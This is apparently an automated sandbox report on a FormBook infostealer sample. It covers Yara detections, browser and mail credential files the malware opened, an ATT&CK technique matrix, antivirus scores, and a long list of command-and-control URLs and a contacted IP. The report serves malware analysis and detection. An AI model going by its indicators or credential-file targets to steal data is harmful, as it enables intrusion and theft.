Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_00040400 GetSystemTimeAsFileTime,

29_2_00040400

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_00100124 _free,_free,_free,GetTimeZoneInformation,_free,

29_2_00100124

Source: C:\Users\user\Desktop\focus.exe

0_2_00403348

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Process Injection512	Obfuscated Files or Information3	Credential API Hooking1	File and Directory Discovery3	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Software Packing11	Security Account Manager	System Information Discovery125	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rootkit1	NTDS	Security Software Discovery241	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Process Discovery2	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion31	Cached Domain Credentials	Virtualization/Sandbox Evasion31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection512	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
focus.exe	69%	Virustotal		Browse
focus.exe	29%	Metadefender		Browse
focus.exe	90%	ReversingLabs	Win32.Trojan.Phonzy

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll	4%	ReversingLabs
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	2%	ReversingLabs
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	21%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	50%	ReversingLabs	Win32.Trojan.Graftor
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	29%	Metadefender		Browse
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	69%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.focus.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
0.2.focus.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
2.2.player-toolkit.exe.10000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.thebosscollectionn.com	0%	Avira URL Cloud	safe
http://www.ordertds.com	0%	Avira URL Cloud	safe
http://www.buymysoft.com	0%	Avira URL Cloud	safe
http://www.ordertds.com/vns/	0%	Avira URL Cloud	safe
http://www.milkweedmagic.com/vns/	0%	Avira URL Cloud	safe
http://www.ocarlosresolve.com/vns/	0%	Avira URL Cloud	safe
http://www.wiitendo.com/vns/	0%	Avira URL Cloud	safe
http://www.LosslessAudio.org2	0%	Avira URL Cloud	safe
http://www.sparkspressworld.comReferer:	0%	Avira URL Cloud	safe
http://www.sparkspressworld.com/vns/	0%	Avira URL Cloud	safe
http://www.domennyarendi44.net/vns/www.milkweedmagic.com	0%	Avira URL Cloud	safe
http://www.sparkspressworld.com/vns/www.ocarlosresolve.com	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.innergardenhealing.space/vns/	0%	Avira URL Cloud	safe
http://www.lyricwiki.org	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.milkweedmagic.com/vns/www.buymysoft.com	0%	Avira URL Cloud	safe
http://www.athleticamackay.com/vns/www.xn--laclnicadelvnculo-gvbi.com	0%	Avira URL Cloud	safe
http://www.everydayresidency.com	0%	Avira URL Cloud	safe
http://www.ocarlosresolve.com/vns/www.athleticamackay.com	0%	Avira URL Cloud	safe
http://www.worklesshours.com/vns/	0%	Avira URL Cloud	safe
http://www.thebosscollectionn.com/vns/www.wiitendo.com	0%	Avira URL Cloud	safe
http://www.everydayresidency.comReferer:	0%	Avira URL Cloud	safe
http://www.everydayresidency.com/vns/www.sparkspressworld.com	0%	Avira URL Cloud	safe
http://www.athleticamackay.com/vns/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.ocarlosresolve.com	0%	Avira URL Cloud	safe
http://www.wlwmwntor.com/vns/www.worklesshours.com	0%	Avira URL Cloud	safe
http://www.xn--laclnicadelvnculo-gvbi.com/vns/	0%	Avira URL Cloud	safe
http://www.worklesshours.comReferer:	0%	Avira URL Cloud	safe
http://www.milkweedmagic.comReferer:	0%	Avira URL Cloud	safe
www.hollandhousedesigns.design/vns/	0%	Avira URL Cloud	safe
http://www.forenvid.com/vns/	100%	Avira URL Cloud	malware
http://www.hollandhousedesigns.design/vns/M	0%	Avira URL Cloud	safe
http://www.thebosscollectionn.com/vns/	0%	Avira URL Cloud	safe
http://www.wiitendo.comReferer:	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.innergardenhealing.spaceReferer:	0%	Avira URL Cloud	safe
http://www.thebosscollectionn.comReferer:	0%	Avira URL Cloud	safe
http://www.forenvid.com	100%	Avira URL Cloud	malware
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.athleticamackay.comReferer:	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.worklesshours.com	0%	Avira URL Cloud	safe
http://www.wlwmwntor.comReferer:	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.xn--laclnicadelvnculo-gvbi.comReferer:	0%	Avira URL Cloud	safe
http://www.ocarlosresolve.comReferer:	0%	Avira URL Cloud	safe
http://www.hollandhousedesigns.designReferer:	0%	Avira URL Cloud	safe
http://www.wiitendo.com/vns/www.hollandhousedesigns.design	0%	Avira URL Cloud	safe
http://www.wlwmwntor.com	0%	Avira URL Cloud	safe
https://www.ordertds.com/vns/?BlP=7	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.wlwmwntor.com/vns/	0%	Avira URL Cloud	safe
http://www.everydayresidency.com/vns/	0%	Avira URL Cloud	safe
http://www.sparkspressworld.com	0%	Avira URL Cloud	safe
http://www.xn--laclnicadelvnculo-gvbi.com	0%	Avira URL Cloud	safe
http://www.athleticamackay.com	0%	Avira URL Cloud	safe
http://www.domennyarendi44.net/vns/	0%	Avira URL Cloud	safe
http://www.ordertds.comReferer:	0%	Avira URL Cloud	safe
http://www.domennyarendi44.netReferer:	0%	Avira URL Cloud	safe
http://www.buymysoft.com/vns/www.wlwmwntor.com	0%	Avira URL Cloud	safe
http://www.ordertds.com/vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd	0%	Avira URL Cloud	safe
http://www.buymysoft.com/vns/	0%	Avira URL Cloud	safe
http://www.xn--laclnicadelvnculo-gvbi.com/vns/www.innergardenhealing.space	0%	Avira URL Cloud	safe
http://www.forenvid.com/vns/www.thebosscollectionn.com	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ordertds.com	161.47.48.3	true	true		unknown
www.ordertds.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ordertds.com/vns/	true	Avira URL Cloud: safe	unknown
www.hollandhousedesigns.design/vns/	true	Avira URL Cloud: safe	low
http://www.ordertds.com/vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.thebosscollectionn.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ordertds.com	explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wikia.com/wiki/Wikia.	changelog.txt.0.dr	false		high
http://www.donationcoder.com/Software/Mouser/Updater/downloads/dcuhelper.zip	changelog.txt.0.dr	false		high
http://www.buymysoft.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.milkweedmagic.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ocarlosresolve.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.donationcoder.com/Software/Mouser/Updater/downloads/DcUpdaterSetup.exe	changelog.txt.0.dr	false		high
http://www.wiitendo.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.LosslessAudio.org2	OptimFROG.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.last.fm/api/submissions#subs	changelog.txt.0.dr	false		high
http://www.msn.com/de-ch/?ocid=iehpLMEMhh	wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.sparkspressworld.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkspressworld.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi44.net/vns/www.milkweedmagic.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkspressworld.com/vns/www.ocarlosresolve.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.innergardenhealing.space/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehp	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.lyricwiki.org	changelog.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.milkweedmagic.com/vns/www.buymysoft.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athleticamackay.com/vns/www.xn--laclnicadelvnculo-gvbi.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.everydayresidency.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://skwire.dcmembers.com/fp/?page=trout	changelog.txt.0.dr	false		high
http://www.ocarlosresolve.com/vns/www.athleticamackay.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.worklesshours.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thebosscollectionn.com/vns/www.wiitendo.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehph	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	false		high
http://www.everydayresidency.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	focus.exe	false		high
http://www.everydayresidency.com/vns/www.sparkspressworld.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athleticamackay.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://lyrics.wikia.com.	changelog.txt.0.dr	false		high
http://www.msn.com/?ocid=iehpG	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	false		high
http://www.ocarlosresolve.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.wlwmwntor.com/vns/www.worklesshours.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	focus.exe	false		high
http://www.site.com/music/song.mp3.	changelog.txt.0.dr	false		high
http://www.xn--laclnicadelvnculo-gvbi.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehpL	wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	false		high
http://www.worklesshours.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.milkweedmagic.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.forenvid.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.hollandhousedesigns.design/vns/M	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thebosscollectionn.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.wiitendo.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehpLMEM	wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://lyrics.wikia.com	changelog.txt.0.dr	false		high
http://www.innergardenhealing.spaceReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thebosscollectionn.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.forenvid.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.tiro.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.athleticamackay.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.worklesshours.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wlwmwntor.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.xn--laclnicadelvnculo-gvbi.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ocarlosresolve.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hollandhousedesigns.designReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wiitendo.com/vns/www.hollandhousedesigns.design	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wlwmwntor.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ordertds.com/vns/?BlP=7	wscript.exe, 00000018.00000002.467023538.000000000558F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/ocid=iehp	wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.wlwmwntor.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.everydayresidency.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkspressworld.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xn--laclnicadelvnculo-gvbi.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.athleticamackay.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi44.net/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ordertds.comReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi44.netReferer:	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.buymysoft.com/vns/www.wlwmwntor.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autohotkey.com/forum/topic69642.html	changelog.txt.0.dr	false		high
http://www.buymysoft.com/vns/	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xn--laclnicadelvnculo-gvbi.com/vns/www.innergardenhealing.space	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp	wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.forenvid.com/vns/www.thebosscollectionn.com	explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
161.47.48.3	ordertds.com	United States		19994	RACKSPACEUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412792
Start date:	12.05.2021
Start time:	23:53:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	focus.com (renamed file extension from com to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
